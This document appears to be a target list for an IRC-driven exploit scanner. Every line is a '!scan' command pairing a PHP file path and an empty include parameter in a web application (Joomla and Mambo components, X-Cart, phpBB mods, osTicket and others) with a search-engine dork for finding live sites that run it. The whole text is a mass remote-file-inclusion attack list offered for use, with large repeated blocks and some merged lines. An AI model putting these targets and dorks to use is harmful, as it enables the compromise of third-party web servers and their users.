!scan amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]= “amember”
!scan news/newstopic_inc.php?indir= “Public Media Manager”
!scan phfito/phfito-post?SRC_PATH= “phpFidoNode”
!scan /protection.php?action=logout&siteurl= “/members.php?id=all”
!scan /appserv/main.php?appserv_root= “The AppServ Open Project”
!scan includes/archive/archive_topic.php?phpbb_root_path= IntegraMOD
!scan admin/include/header.php?repertoire= “chupix cms”
!scan forum/forum.php?view= “lustig.cms”
!scan access/login.php?path_to_root= “FrontAccounting”
!scan includes/lang/language.php?path_to_root= “FrontAccounting”
!scan dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth= “DFD Cart”
!scan dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth= “DFD Cart”
!scan dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth= “DFD Cart”
!scan show.php?file= “Helplink”
!scan data/compatible.php?module_name= “Nuke Mobile Entartainment”
!scan config.inc.php?_path= “WordSmith”
!scan modules/search/search.php?language_home=&rootdp=zZz&gsLanguage= “iziContents”
!scan modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage= “iziContents”
!scan modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage= “iziContents”
!scan modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage= “iziContents”
!scan modules/links/submit_links.php?rootdp=zZz&gsLanguage= “iziContents”
!scan modifyform.html?code= modifyform
!scan Encoder.php?base_dir= phpsyncml
!scan Decoder.php?base_dir= phpsyncml
!scan administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site= “com_joom12pic”
!scan phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT= “phpFFL”
!scan phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT= “phpFFL”
!scan afb-3-beta-2007-08-28/_includes/settings.inc.php?approot= “Ajax File Browser”
!scan administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site= inurl:”com_joomlaradiov5″
!scan config.php?xcart_dir= “X-CART. Powerful PHP shopping cart software”
!scan prepare.php?xcart_dir= “X-CART. Powerful PHP shopping cart software”
!scan smarty.php?xcart_dir= “X-CART. Powerful PHP shopping cart software”
!scan customer/product.php?xcart_dir= “X-CART. Powerful PHP shopping cart software”
!scan provider/auth.php?xcart_dir= “X-CART. Powerful PHP shopping cart software”
!scan admin/auth.php?xcart_dir= “X-CART. Powerful PHP shopping cart software”
!scan NuclearBB/tasks/send_queued_emails.php?root_path= NuclearBB
!scan protection.php?action=logout&siteurl= “Site Layout & Graphics”
!scan protection.php?action=logout&siteurl= statcounter
!scan protection.php?action=logout&siteurl= “PHPFanBase”
!scan manager/admin/index.php?MGR= “phpRealty”
!scan manager/admin/p_ins.php?MGR= “phpRealty”
!scan manager/admin/u_ins.php?MGR= “phpRealty”
!scan source/mod/rss/viewitem.php?Codebase= ED Engine
!scan source/mod/rss/view.php?Codebase= ED Engine
!scan source/mod/rss/post.php?Codebase= ED Engine
!scan source/mod/rss/channeledit.php?Codebase= WebEd
!scan joomla/index.php?option=com_restaurante&task= “/index.php?option=com_restaurante”
!scan modules/addons/plugin.php?doc_root= “txx cms”
!scan modules/addons/plugin.php?doc_root= inurl:addons
!scan modules/Discipline/CategoryBreakdownTime.php?FocusPath= inurl:Discipline
!scan modules/Discipline/CategoryBreakdownTime.php?staticpath= inurl:Discipline
!scan modules/Discipline/StudentFieldBreakdown.php?staticpath= inurl:Discipline
!scan lib/functions.php?DOC_ROOT= “Online Fantasy Football League”
!scan lib/header.php?DOC_ROOT= “Online Fantasy Football League”
!scan menu.php?functions_file= phpMytourney
!scan environment.php?DIR_PREFIX= AnyInventory
!scan dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH= Phpof
!scan stphpapplication.php?STPHPLIB_DIR= SpeedTech PHP Library
!scan senetman/html/index.php?page= eNetman
!scan es_desp.php?files_dir= Weblogicnet
!scan es_custom_menu.php?files_dir= Weblogicnet
!scan es_offer.php?files_dir= Weblogicnet
!scan stphpbtnimage.php?STPHPLIB_DIR= SpeedTech PHP Library
!scan stphpform.php?STPHPLIB_DIR= SpeedTech PHP Library
!scan stphpapplication.php?STPHPLIB_DIR= “stph”
!scan stphpbtnimage.php?STPHPLIB_DIR= “stph”
!scan stphpform.php?STPHPLIB_DIR= “stph”
!scan senetman/html/index.php?page= “senetman”
!scan /intern/admin/other/backup.php?admin=1&rootdir= “phpBG”
!scan /intern/admin/?rootdir= “phpBG”
!scan /intern/clan/member_add.php?rootdir= “phpBG”
!scan /intern/config/key_2.php?rootdir= “phpBG”
!scan /intern/config/forum.php?rootdir= “phpBG”
!scan xGB.php?act=admin&do= allinurl:”xGb.php”
!scan modules/vwar/convert/mvcw_conver.php?step=1&vwar_root= “mvcw_conver.php”
!scan convert/mvcw.php?vwar_root= “convert/mvcw.php”
!scan convert/mvcw.php?step=1&vwar_root= “convert/mvcw.php”
!scan public_includes/pub_blocks/activecontent.php?vsDragonRootPath= inurl:activecontent.php
!scan public_includes/pub_blocks/activecontent.php?vsDragonRootPath= “Php Blue Dragon”
!scan ncaster/admin/addons/archive/archive.php?adminfolder= inurl:ncaster
!scan ncaster/admin/addons/archive/archive.php?adminfolder= Ncaster 1.7.2
!scan /chat/inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:.ru
!scan database.php?mosConfig_absolute_path= “powered by mambo”
!scan config.php?path_to_root= inurl:”path_to_root”
!scan order/login.php?svr_rootscript= “order?page=plan_show”
!scan admin/inc/change_action.php?format_menue= “PHPNews Version 0.93″
!scan order/login.php?svr_rootscript= “order?page=plan_show”
!scan /include.php?path[docroot]= inurl:”newspublish”
!scan newsletter/newsletter.php?waroot= inurl:newsletter.php?
!scan mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]= inurl:mediagallery/
!scan beacon/language/1/splash.lang.php?languagePath= inurl:/beacon/
!scan common/func.php?CommonAbsDir= inurl: func.php?
!scan /surveys/survey.inc.php?path= inurl:surveys
!scan index.php?body= inurl:”index.php?body=”
!scan /classes/adodbt/sql.php?classes_dir= allinurl:adobt site:pl
!scan enc/content.php?Home_Path= “powered by doodle cart”
!scan /classified_right.php?language_dir= inurl:classified.php phpbazar
!scan /sources/functions.php?CONFIG[main_path]= “(Powered By ScozNews)”
!scan /sources/template.php?CONFIG[main_path]= “(Powered By ScozNews)”
!scan /embed/day.php?path= intitle:”Login to Calendar”
!scan /includes/dbal.php?eqdkp_root_path= “powered by EQdkp”
!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= “Powered By Aardvark Topsites PHP 4.2.2″
!scan /includes/kb_constants.php?module_root_path= “Powered by Knowledge Base”
!scan /mcf.php?content= allinurl:”mcf.php” site:.de
!scan /components/com_facileforms/facileforms.frame.php?ff_compath= allinurl:”com_facileforms” site:.org
!scan skins/advanced/advanced1.php?pluginpath[0]= “Sabdrimer CMS”
!scan /zipndownload.php?PP_PATH= “Powered by: PhotoPost PHP 4.6″
!scan /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= inurl:”com_serverstat”
!scan /components/com_zoom/includes/database.php?mosConfig_absolute_path= inurl:”index.php?option=”com_zoom”
!scan /main.php?sayfa= inurl:”main.php?sayfa=”
!scan /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= allinurl:com_extended_registration
!scan /addpost_newpoll.php?addpoll=preview&thispath= allinurl:”/ubbthreads/”
!scan /header.php?abspath= “MobilePublisherPHP”
!scan components/com_performs/performs.php?mosConfig_absolute_path= inurl:”com_performs”
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:index.php?option=com_remository
!scan impex/ImpExData.php?systempath= intext:powered by vbulletin
!scan /modules/vwar/admin/admin.php?vwar_root= allinurl:vwar site:.com
!scan /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= “powered by phpCOIN”
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:.com/index.php?option=com_remository
!scan /tools/send_reminders.php?includedir= allinurl:day.php?date=
!scan /skin/zero_vote/error.php?dir= skin/zero_vote/error.php
!scan /modules/TotalCalendar/about.php?inc_dir= allinurl:/TotalCalendar
!scan /login.php?dir= allinurl:login.php?dir=
!scan /tags.php?BBCodeFile= intitle:”Tagger LE” inurl:tags.php
!scan index.php?pageurl= inurl:”index.php?pageurl=*.php”
!scan /templates/headline_temp.php?nst_inc= “fusion news management system”
!scan index.php?var= inurl:”index.php?var=*.php”
!scan index.php?pagina= inurl:”index.php?pagina=*.php”
!scan index.php?go= inurl:”index.php?go=”
!scan index.php?site= inurl:”index.php?site=”
!scan phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:”phpwcms/index.php?id=”
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:”.com.*/index.php?option=com_comprofiler”
!scan index.php?pagina= inurl:”index.php?pagina=*.php”
!scan index.php?id= inurl:”index.php?id=*.php”
!scan index1.php?= inurl:”index1.php?=*.php?
!scan index.php?site= inurl:”index.php?site=*.php”
!scan main.php?id= inurl:”main.php?id=*.php”
!scan content.php?page= inurl:”content.php?page=*.php”
!scan admin.php?page= inurl:”admin.php?page=*.php”
!scan lib/gore.php?libpath= inurl:”/SQuery/”
!scan SQuery/lib/gore.php?libpath= inurl:”/SQuery/”
!scan index2.php?p= inurl:”index2.php?p=*.php”
!scan index1.php?go= inurl:”index1.php?go=*.php”
!scan news_detail.php?file= inurl:”news_detail.php?file=*.php”
!scan old_reports.php?file= inurl:”old_reports.php?file=*.php”
!scan index.php?x= inurl:”index.php?x=*.php”
!scan index.php?nic= inurl:”index.php?nic=*.php”
!scan homepage.php?sel= inurl:”homepage.php?sel=*.php”
!scan index.php?sel= inurl:”index.php?sel=*.php”
!scan main.php?x= inurl:”main.php?x=*.php”
!scan components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= “inurl:com_artlinks”
!scan index2.php?x= inurl:index2.php?x=*.php”
!scan main.php?pagina= inurl:”main.php?pagina=*.php”
!scan test.php?page= allinurl:test.php?page=
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= “inurl:com_phpshop”
!scan akocomments.php?mosConfig_absolute_path= inurl:akocomments.php
!scan index.php?page= inurl:”edu/index.php?page=*.php”
!scan *.php?page= inurl:*.php?page=*.php”
!scan index.php?oldal= inurl:”index.php?oldal=*.php”
!scan index.php?lang=gr&file inurl:”index.php?lang=gr&file=*.php”
!scan index.php?pag= inurl:”index.php?pag=*.php”
!scan index.php?incl= inurl:”index.php?incl=”
!scan avatar.php?page= inurl:”avatar.php?page=”
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= “Mambo is A Free
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= “Mambo is”
!scan ndex.php?p= inurl:”edu/index.php?p=*.php”
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xgallery/
!scan index.php?x= inurl:”com/index.php?x=*.php”
!scan index.php?mode= inurl:”com/index.php?mode=*.php”
!scan index.php?stranica= inurl:”index.php?stranica=”
!scan index.php?sub= inurl:”il/index.php?sub=*.php”
!scan index.php?id= inurl:”/index.php?id=*.php”
!scan index.php?t= inurl:”/index.php?t=*.php”
!scan index.php?r= inurl:”index.php?r=*.php”
!scan index.php?menu= inurl:”net/index.php?menu=*.php”
!scan index.php?pag= inurl:”com/index.php?pag=*.php”
!scan solpot.html?body= allinurl: “solpot.html?body”
!scan port.php?content= inurl:port.php?content=*.php”
!scan index0.php?show= inurl:index0.php?show=*.php”
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler”
!scan /tools/send_reminders.php?includedir= allinurl:day.php?date= inurl:/day.php?date=
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:/index.php?option=com_remository
!scan /tags.php?BBCodeFile= intitle:”Tagger LE” inurl:tags.php site:br
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler”
!scan content.php?page= inurl:”*content.php?page=*.php”
!scan index.php?topic= inurl:”/index.php?topic=*.php”
!scan index.php?u= inurl:”/index.php?u=*.php”
!scan administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:”com_linkdirectory”
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:”.tr./components”
!scan modules/My_eGallery/index.php?basepath= inurl:”My_eGallery”
!scan /modules/vwar/admin/admin.php?vwar_root= inurl:”vwar”
!scan index.php?loc= allinurl:.br/index.php?loc=
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:”us/index.php?option=com_comprofiler”
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:”com_cropimage”
!scan /tags.php?BBCodeFile= intitle:”Tagger LE” inurl:tags.php
!scan myevent.php?myevent_path= inurl:myevent.php
!scan /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= allinurl:”com_uhp”
!scan myevent.php?myevent_path= inurl:”uk/myevent.php
!scan includes/functions.php?phpbb_root_path= powered by Integramod
!scan m2f/m2f_phpbb204.php?m2f_root_path= allinurl:/m2f_usercp.php?
!scan /tags.php?BBCodeFile= intitle:”Tagger LE” inurl:”uk/tags.php
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:”us/index.php?option=com_remository
!scan show.php?path= inurl:fclick
!scan show.php?path= inurl:.ac.uk/fclick
!scan administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:”.de.*/com_linkdirectory”
!scan administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= inurl:”com_a6mambocredits”
!scan index.php?template= inurl:”index.php?”
!scan search.php?cutepath= inurl:”search.php?”
!scan show_news.php?cutepath= inurl:”show_news.php?”
!scan page.php?doc= allinurl:”page.php?doc=”
!scan administrator/components/com_webring/admin.webring.docs.php?component_dir= inurl:”com_webring”
!scan administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= inurl:”.de.*/com_mgm”
!scan help.php?css_path= inurl:phplive site:.ru
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:”com_galleria/”
!scan big.php?pathtotemplate= inurl:”.de.*”big.php?”
!scan includes/search.php?GlobalSettings[templatesDirectory]= inurl:”.com”search.php?”
!scan interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include= “Papoo CMS”
!scan /functions.php?include_path= “powered by: phpecard”
!scan modules/My_eGallery/index.php?basepath= inurl:”.de.*”My_eGallery”
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:”.net.*”com_galleria/”
!scan /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= “powered by CubeCart 3.0.6″
!scan /class.mysql.php?path_to_bt_dir= “powered by paBugs 2.0 Beta 3″
!scan /include/footer.inc.php?_AMLconfig[cfg_serverpath]= “powered by AllMyLinks”
!scan /squirrelcart/cart_content.php?cart_isp_root= allinurl:/squirrelcart/
!scan index2.php?to= inurl:”/index2.php?to=*.php”
!scan index.php?load= inurl:”/index.php?load=*.php”
!scan home.php?pagina= inurl:”home.php?pagina=”
!scan /modules/coppermine/include/init.inc.php?CPG_M_DIR= allinurl:modules.php?name=coppermine
!scan /modules/Forums/admin/admin_styles.php?phpbb_root_path= allinurl:modules.php?name=forums
!scan /modules/vwar/admin/admin.php?vwar_root= allinurl:modules.php?name=vwar
!scan /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= allinurl:modules.php?name=PNphpBB2
!scan /modules/My_eGallery/public/displayCategory.php?basepath= allinurl:modules.php?name=my_egallery
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:modules.php?name=xgallery
!scan /modules/4nAlbum/public/displayCategory.php?basepath= allinurl:modules.php?name=4nAlbum
!scan /include/write.php?dir= allinurl:/zboard/zboard.php
!scan db.php?path_local= inurl:”db.php?path_local=”
!scan index.php?site= inurl:”index.php?site=”
!scan index.php?url= inurl:”index.php?url=”
!scan index.php?p= inurl:”index.php?p=”
!scan index.php?openfile= inurl:”index.php?openfile=”
!scan index.php?file= inurl:”index.php?file=”
!scan index.php?go= inurl:”index.php?go=”
!scan index.php?content= inurl:”index.php?content=”
!scan index.php?side= inurl:”index.php?side=”
!scan index.php?kobr= inurl:”index.php?kobr=”index.php?pg= inurl:”index.php?pg=”
!scan index.php?doc= inurl:”index.php?doc=”
!scan index.php?l= inurl:”index.php?l=”
!scan index.php?a= inurl:”index.php?a=”
!scan index.php?principal= inurl:”index.php?principal=”
!scan index.php?show= inurl:”index.php?show=”
!scan index.php?opcao= inurl:”index.php?opcao=”
!scan index.php?conteudo= inurl:”index.php?conteudo=”
!scan index.php?meio= inurl:”index.php?meio=”
!scan index.php?inc= inurl:”index.php?inc=”
!scan index.php?c= inurl:”index.php?c=”
!scan index.php?rage= inurl:”index.php?rage=”
!scan index.php?arquivo= inurl:”index.php?arquivo=”
!scan index.php?nic= inurl:”index.php?nic=”
!scan index.php?x= inurl:”index.php?x=”
!scan components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= inurl:”com_mtree”
!scan index.php?place= inurl:”index.php?place=”
!scan index.php?show= inurl:”index.php?show=”
!scan index.php?dsp= inurl:”index.php?dsp=”
!scan index.php?dept= inurl:”index.php?dept=”
!scan index.php?lg= inurl:”index.php?lg=”
!scan index.php?inhalt= inurl:”index.php?inhalt=”
!scan index.php?ort= inurl:”index.php?ort=”
!scan index.php?pilih= inurl:”index.php?pilih=”
!scan principal.php?conteudo= inurl:”principal.php?conteudo=”
!scan main.php?site= inurl:”main.php?site=”
!scan template.php?pagina= inurl:”template.php?pagina=”
!scan contenido.php?sec= inurl:”contenido.php?sec=”
!scan index_principal.php?pagina= inurl:”index_principal.php?pagina=”
!scan template.php?name= inurl:”template.php?name=”
!scan forum.php?act= inurl:”forum.php?act=”
!scan home.php?action= inurl:”home.php?action=”
!scan home.php?pagina= inurl:”home.php?pagina=”
!scan noticias.php?arq= inurl:”noticias.php?arq=”
!scan main.php?x= inurl:”main.php?x=”
!scan main.php?page= inurl:”main.php?page=”
!scan default.php?page= inurl:”default.php?page=”
!scan index.php?cont= inurl:”index.php?cont=”
!scan index.php?configFile= inurl:”index.php?configFile=”
!scan index.php?meio.php= inurl:”index.php?meio.php=”
!scan index.php?include= inurl:”index.php?include=”
!scan index.php?open= inurl:”index.php?open=
!scan index.php?visualizar= inurl:”index.php?visualizar=”
!scan index.php?x= inurl:”index.php?x=”
!scan index.php?pag= inurl:”index.php?pag=”
!scan index.php?cat= inurl:”index.php?cat=”
!scan index.php?action= inurl:”index.php?action=”
!scan index.php?do= inurl:”index.php?do=”
!scan index2.php?x= inurl:”index2.php?x=”
!scan index2.php?content= inurl:”index2.php?content=”
!scan main.php?pagina= inurl:”main.php?pagina=”
!scan index.phpmain.php?x= inurl:”index.phpmain.php?x=”
!scan index.php?link= inurl:”index.php?link=”
!scan index.php?canal= inurl:”index.php?canal=”
!scan index.php?screen= inurl:”index.php?screen=”
!scan index.php?langc= inurl:”index.php?langc=”
!scan services.php?page= inurl:”services.php?page=”
!scan htmltonuke.php?filnavn= inurl:”htmltonuke.php?filnavn=”
!scan ihm.php?p= inurl:”ihm.php?p=”
!scan default.php?page= inurl:”default.php?page=”
!scan folder.php?id= inurl:”folder.php?id=”
!scan index.php?Load= inurl:”index.php?Load=”
!scan index.php?Language= inurl:”index.php?Language=”
!scan hall.php?file= inurl:”hall.php?file=”
!scan hall.php?page= inurl:”hall.php?page=”
!scan template.php?goto= inurl:”template.php?goto=”
!scan video.php?content= inurl:”video.php?content=”
!scan pages.php?page= inurl:”pages.php?page=”
!scan print.php?page= inurl:”print.php?page=”
!scan show.php?page= inurl:”show.php?page=”
!scan view.php?page= inurl:”view.php?page=”
!scan media.php?page= inurl:”media.php?page=”
!scan index1.php?choix= inurl:”index1.php?choix=”
!scan index1.php?menu= inurl:”index1.php?menu”
!scan index.php?ort= inurl:”index.php?ort=”
!scan index2.php?showpage= inurl:”index2.php?showpage=”
!scan index2.php?ascii_seite= inurl:”index2.php?ascii_seite=”
!scan index2.php?DoAction= inurl:”index2.php?DoAction=”
!scan index2.php?ID= inurl:”index2.php?ID=”
!scan index2.php?url_page= inurl:”index2.php?url_page=”
!scan index1.php?dat= inurl:”index1.php?dat=”
!scan index1.php?site= inurl:”index1.php?site=”
!scan index0.php?show= inurl:”index0.php?show=”
!scan home.php?content= inurl:”home.php?content=”
!scan port.php?content= inurl:”port.php?content=”
!scan main.php?link= inurl:”main.php?link=”
!scan home.php?x= inurl:”home.php?x=”
!scan index1.php?x= inurl:”index1.php?x=”
!scan index2.php?x= inurl:”index2.php?x=”
!scan main.php?x= inurl:”main.php?x=”
!scan homepage.php?sel= inurl:”homepage.php?sel=”

!scan /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xoopsgallery/
!scan /modules/agendax/addevent.inc.php?agendax_path= allinurl:/agendax/
!scan /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/
!scan /contrib/yabbse/poc.php?poc_root_path= ntitle:PHPOpenChat ext:php
!scan /phpopenchat/contrib/yabbse/poc.php?sourcedir= ntitle:PHPOpenChat ext:php
!scan /photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum
!scan /squito/photolist.inc.php?photoroot= “Squitosoft All Rights Reserved”
!scan /bz/squito/photolist.inc.php?photoroot= “Squitosoft All Rights Reserved”
!scan /ppa/inc/functions.inc.php?config[ppa_root_path]= allinurl:**/screens/displayimage.php?pid=*
!scan /spid/lang/lang.php?lang_path= allinurl:**/spid.php allinurl:**/spid.php?cat=*lang=
!scan /classes.php?LOCAL_PATH= “powered by siteframe”
!scan al_initialize.php?alpath= “Powered by AutoLinks Pro”
!scan /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= allinurl:*br*/newbb_plus/*
!scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “Powered by Mambo” inurl:*gov*
!scan /extensions/moblog/moblog_lib.php?basedir= “powered by pivot”
!scan /app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= “phpCodeGenie v. 3.0.2″
!scan components/com_performs/performs.php?mosConfig_absolute_path= inurl:”com_performs”
!scan modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= inurl:”AllMyGuests”
!scan /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= allinurl:”com_rsgallery”
!scan /components/com_smf/smf.php?mosConfig_absolute_path= allinurl:”com_smf”
!scan /components/com_cpg/cpg.php?mosConfig_absolute_path= index.php?option=com_cpg
!scan administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= inurl:”com_peoplebook”
!scan /admin_modules/admin_module_deldir.inc.php?config[path_src_include]= “Powered by yappa-ng 2.3.1″
!scan inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:br bp_ncom.php?bnrep= “Script r?alis? par BinGo PHP”
!scan /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= inurl:”/com_mtree/”
!scan /jscript.php?my_ms[root]= intitle:”myspeach” inurl:”chat_exemple.php”
!scan /popup_window.php?site_isp_root= inurl:”Squirrelcart”
!scan /yabbse/Sources/Packages.php?sourcedir= inurl:Yabbse
!scan /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ site:fr
!scan /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ site:uk
!scan /includes/functions_portal.php?phpbb_root_path= “powered by Integramod”
!scan historytemplate.php?cms[support]=1&cms[tngpath]= “powered by The Next Generation of Genealogy Sitebuilding”
!scan /components/com_simpleboard/image_upload.php?sbp= inurl:”com_simpleboard”

!scan /surveys/survey.inc.php?path= inurl:surveys
!scan index.php?body= inurl:”index.php?body=”
!scan /classes/adodbt/sql.php?classes_dir= allinurl:adobt site:pl
!scan enc/content.php?Home_Path= “powered by doodle cart”
!scan /classified_right.php?language_dir= inurl:classified.php phpbazar
!scan /sources/functions.php?CONFIG[main_path]= “(Powered By ScozNews)”
!scan /sources/template.php?CONFIG[main_path]= “(Powered By ScozNews)”
!scan /embed/day.php?path= intitle:”Login to Calendar”
!scan /includes/dbal.php?eqdkp_root_path= “powered by EQdkp”
!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= “Powered By Aardvark Topsites PHP 4.2.2″
!scan /includes/kb_constants.php?module_root_path= “Powered by Knowledge Base”
!scan /mcf.php?content= allinurl:”mcf.php” site:.de
!scan /components/com_facileforms/facileforms.frame.php?ff_compath= allinurl:”com_facileforms” site:.ar
!scan skins/advanced/advanced1.php?pluginpath[0]= “Sabdrimer CMS”
!scan /zipndownload.php?PP_PATH= “Powered by: PhotoPost”
!scan /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= inurl:”com_serverstat”
!scan /components/com_zoom/includes/database.php?mosConfig_absolute_path= inurl:”index.php?option=”com_zoom”
!scan /main.php?sayfa= inurl:”main.php?sayfa=”
!scan /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= allinurl:com_extended_registration
!scan /addpost_newpoll.php?addpoll=preview&thispath= allinurl:”/ubbthreads/”
!scan /header.php?abspath= “MobilePublisherPHP”
!scan components/com_performs/performs.php?mosConfig_absolute_path= inurl:”com_performs”
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:index.php?option=com_remository
!scan impex/ImpExData.php?systempath= intext:powered by vbulletin
!scan /modules/vwar/admin/admin.php?vwar_root= allinurl:vwar site:.com
!scan /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= “powered by phpCOIN 1.2.3″
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:.com/index.php?option=com_remository
!scan /tools/send_reminders.php?includedir= allinurl:day.php?date=
!scan /skin/zero_vote/error.php?dir= skin/zero_vote/error.php
!scan /modules/TotalCalendar/about.php?inc_dir= allinurl:/TotalCalendar
!scan /login.php?dir= allinurl:login.php?dir=
!scan /tags.php?BBCodeFile= intitle:”Tagger LE” inurl:tags.php
!scan index.php?pageurl= inurl:”index.php?pageurl=*.php”
!scan /templates/headline_temp.php?nst_inc= allintitle:fusion:news:management:system
!scan index.php?var= inurl:”index.php?var=*.php”
!scan index.php?pagina= inurl:”index.php?pagina=*.php”
!scan index.php?go= inurl:”index.php?go=”
!scan index.php?site= inurl:”index.php?site=”
!scan phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:”phpwcms/index.php?id=”
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:”.com.*/index.php?option=com_comprofiler”
!scan index.php?pagina= inurl:”index.php?pagina=*.php”
!scan index.php?id= inurl:”index.php?id=*.php”
!scan index1.php?= inurl:”index1.php?=*.php?
!scan index.php?site= inurl:”index.php?site=*.php”
!scan main.php?id= inurl:”main.php?id=*.php”
!scan content.php?page= inurl:”content.php?page=*.php”
!scan admin.php?page= inurl:”admin.php?page=*.php”
!scan lib/gore.php?libpath= inurl:”/SQuery/”
!scan SQuery/lib/gore.php?libpath= inurl:”/SQuery/”
!scan index2.php?p= inurl:”index2.php?p=*.php”
!scan index1.php?go= inurl:”index1.php?go=*.php”
!scan news_detail.php?file= inurl:”news_detail.php?file=*.php”
!scan old_reports.php?file= inurl:”old_reports.php?file=*.php”
!scan index.php?x= inurl:”index.php?x=*.php”
!scan index.php?nic= inurl:”index.php?nic=*.php”
!scan homepage.php?sel= inurl:”homepage.php?sel=*.php”
!scan index.php?sel= inurl:”index.php?sel=*.php”
!scan main.php?x= inurl:”main.php?x=*.php”
!scan components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= “inurl:com_artlinks”
!scan index2.php?x= inurl:index2.php?x=*.php”
!scan main.php?pagina= inurl:”main.php?pagina=*.php”
!scan test.php?page= allinurl:test.php?page=
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= “inurl:com_phpshop”
!scan akocomments.php?mosConfig_absolute_path= inurl:akocomments.php
!scan index.php?page= inurl:”edu/index.php?page=*.php”
!scan *.php?page= inurl:*.php?page=*.php”
!scan index.php?oldal= inurl:”index.php?oldal=*.php”
!scan index.php?lang=gr&file inurl:”index.php?lang=gr&file=*.php”
!scan index.php?pag= inurl:”index.php?pag=*.php”
!scan index.php?incl= inurl:”index.php?incl=”
!scan avatar.php?page= inurl:”avatar.php?page=”
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= “Mambo is A Free
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= “Mambo is”
!scan ndex.php?p= inurl:”edu/index.php?p=*.php”
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xgallery/
!scan index.php?x= inurl:”com/index.php?x=*.php”
!scan index.php?mode= inurl:”com/index.php?mode=*.php”
!scan index.php?stranica= inurl:”index.php?stranica=”
!scan index.php?sub= inurl:”il/index.php?sub=*.php”
!scan index.php?id= inurl:”/index.php?id=*.php”
!scan index.php?t= inurl:”/index.php?t=*.php”
